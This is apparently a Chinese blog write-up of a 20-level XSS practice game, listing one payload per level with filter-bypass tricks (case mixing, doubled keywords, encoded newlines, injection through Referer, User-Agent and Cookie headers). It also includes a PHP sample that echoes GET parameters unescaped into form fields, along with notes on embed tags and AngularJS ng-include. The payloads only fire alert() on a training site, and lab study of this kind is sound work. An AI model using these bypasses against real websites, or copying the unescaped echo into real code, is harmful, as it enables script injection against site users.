xss

url:http://test.ctf8.com/level1.php?name=test

小游戏payload:

  1. <script>alert("'test'")</script>
  2. "><script>alert("'test'")</script>
  3. ' onclick=alert("'test'") '
  4. " onclick=alert("'test'") "
  5. "><a href=javascript:alert("'test'")>test</a>
  6. "><scRipt>alert("'test'")</sCript>
  7. "><scriscriptpt>alert("'test'")</scriscriptpt>
  8. javascript:alert(1)
  9. javascript:alert(1)/* http://test*/
  10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
  11. Referer: test" onclick=alert("'test'") type="text
  12. User-Agent:test" onclick=alert("'test'") type="text
  13. Cookie: user=test" onclick=alert("'test'") type="text
  14. 据说是一个图片中的exif信息,但是网址已失效;
  15. level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
  16. level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
  17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
  18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
  19. flash xss
  20. flash xss

有些参数可能会隐藏哦:

源码:get.php

<?php

echo "<h2>php变量提交get参数:</h2>";

$str = $_GET["name"];

$str2 = $_GET["sex"];

echo "<h2>form表单提交get参数</h2>".'

<center>

<form id=form>

<p>姓名:</p><input name="name"  value="'.'" type="text">

<p>input通过php接收姓名参数:</p><input name="form"  value="'.$str.'" type="text">

<p>直接接收php性别参数</p><input name="form2"  value="'.$str2.'" type="text">

<input type="submit" value="提交"/>

</form>

</center>';

?>
  1. url中能看到的参数:?name=xiaoming&form=&form2=
  2. 没有在URL中显示参数:&sex=
  3. DOM不经过服务器的
  • 能显示在url中的参数中的是form表单中name属性定义的参数;php定义的需要手动添加,或者链接到form表单上;

在线编码网站:http://monyer.com/demo/monyerjs/

<embed>标签

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

<embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

<embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

AngularJS中的ng-include

  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

fath.html内容:

<head>

        <meta charset="utf-8">

        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>

</head>

<body>

    <div ng-include="'son.html'"></div>

    <!-- 路径里面必须带上单引号 -->

    <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错-->

</body>

son.html内容:

Hello world

数据一次完整的编码解码过程:

xss小游戏通关的更多相关文章

  1. XSS小游戏通关Writeup

    源码下载:https://files.cnblogs.com/files/nul1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我也没啥可 ...

  2. XSS----payload,绕过,xss小游戏记录

    一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码. 1.xss实例代码: test.html <!DOCTYPE h ...

  3. xss小游戏源码分析

    配置 下载地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip 使用:下载解压,放到www目录下(phpstudy),http服务下都 ...

  4. XSS小游戏

    第一关 直接在URL输入 ?name=<script>alert('xss')</script> 第二关 找源码,输入test,value值变为test,我们可以在输入框尝试x ...

  5. xss games20关小游戏附源代码

    1. get方式的的值直接输出来了. ?name=<script>alert(1)</script> 2. 同样没有过滤,不过需要闭合前边的双引号和>. "&g ...

  6. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  7. Monyer.cn黑客小游戏

    花了一天的时间,Monyer给大家带来了一个有趣的东东——拥有15个关卡的黑客小游戏. 入口http://monyer.com/game/game1 因为一直以来都是大家跟我一起学习网络技术嘛,所以这 ...

  8. Javascript贪食蛇小游戏

    试玩:http://hovertree.com/game/9/ 贪吃蛇是一种风靡全球的小游戏,就是一条小蛇,不停地在屏幕上游走,吃各个方向出现的蛋,越吃越长.只要蛇头碰到屏幕四周,或者碰到自己的身子, ...

  9. 【python游戏编程之旅】第九篇---嗷大喵快跑小游戏开发实例

    本系列博客介绍以python+pygame库进行小游戏的开发.有写的不对之处还望各位海涵. 前几期博客我们一起学习了,pygame中的冲突检测技术以及一些常用的数据结构. 这次我们来一起做一个简单的酷 ...

随机推荐

  1. 算法-图(1)Dijkstra求最短路径

    数组dist[],是当前求到的顶点v到顶点j的最短路径长度 数组path[]存放求到的最短路径,如path[4]=2,path[2]=3,path[3]=0,则路径{0,3,2,4}就是0到4的最短路 ...

  2. LG P4161 [SCOI2009]游戏/LG P6280 [USACO20OPEN]Exercise G

    Description(P4161) windy学会了一种游戏. 对于1到N这N个数字,都有唯一且不同的1到N的数字与之对应. 最开始windy把数字按顺序1,2,3,……,N写一排在纸上. 然后再在 ...

  3. [CSP-S2019]Emiya 家今天的饭 题解

    CSP-S2 2019 D2T1 很不错的一题DP,通过这道题学到了很多. 身为一个对DP一窍不通的蒟蒻,在考场上还挣扎了1h来推式子,居然还有几次几乎推出正解,然而最后还是只能打个32分的暴搜滚粗 ...

  4. seo如何发外链

    http://www.wocaoseo.com/thread-228-1-1.html 在做外链方面博主并没有什么太多的经验,做为一位seo,下面武汉seo把自己做外链的大条列出来,都是经过本身实践并 ...

  5. 百度官方给出的seo优化策略

    http://www.wocaoseo.com/thread-157-1-1.html 因为要参加seo工程师考试了,这两天一直在学习seo的基础理论,昨天也写了备战seo工程师考试的文章,说实在话, ...

  6. Python最火的第三方开源测试框架 ——pytest

    一.介绍 本篇文章是介绍的是Python 世界中最火的第三方单元测试框架:pytest.它有如下主要特性: assert 断言失败时输出详细信息(再也不用去记忆 self.assert* 名称了) 自 ...

  7. PAT-B1009 说反话 - 字符串反转

    1009 说反话 (20分) 给定一句英语,要求你编写程序,将句中所有单词的顺序颠倒输出. 输入格式: 测试输入包含一个测试用例,在一行内给出总长度不超过 80 的字符串.字符串由若干单词和若干空格组 ...

  8. npm install @wepy/cli -g 出错

    npm install @wepy/cli -g 出错:npm ERR! Unexpected end of JSON input while parsing near '...1.0.0" ...

  9. Apache Pulsar 社区周报:08-08 ~ 08-14

    关于 Apache Pulsar Apache Pulsar 是 Apache 软件基金会顶级项目,是下一代云原生分布式消息流平台,集消息.存储.轻量化函数式计算为一体,采用计算与存储分离架构设计,支 ...

  10. Mybatis 枚举类处理

    目录 类型处理器(TypeHandler) 内置的枚举处理器 EnumTypeHandler源码 自定义枚举类处理 通用枚举处理器 Git 类型处理器(TypeHandler) 无论是 MyBatis ...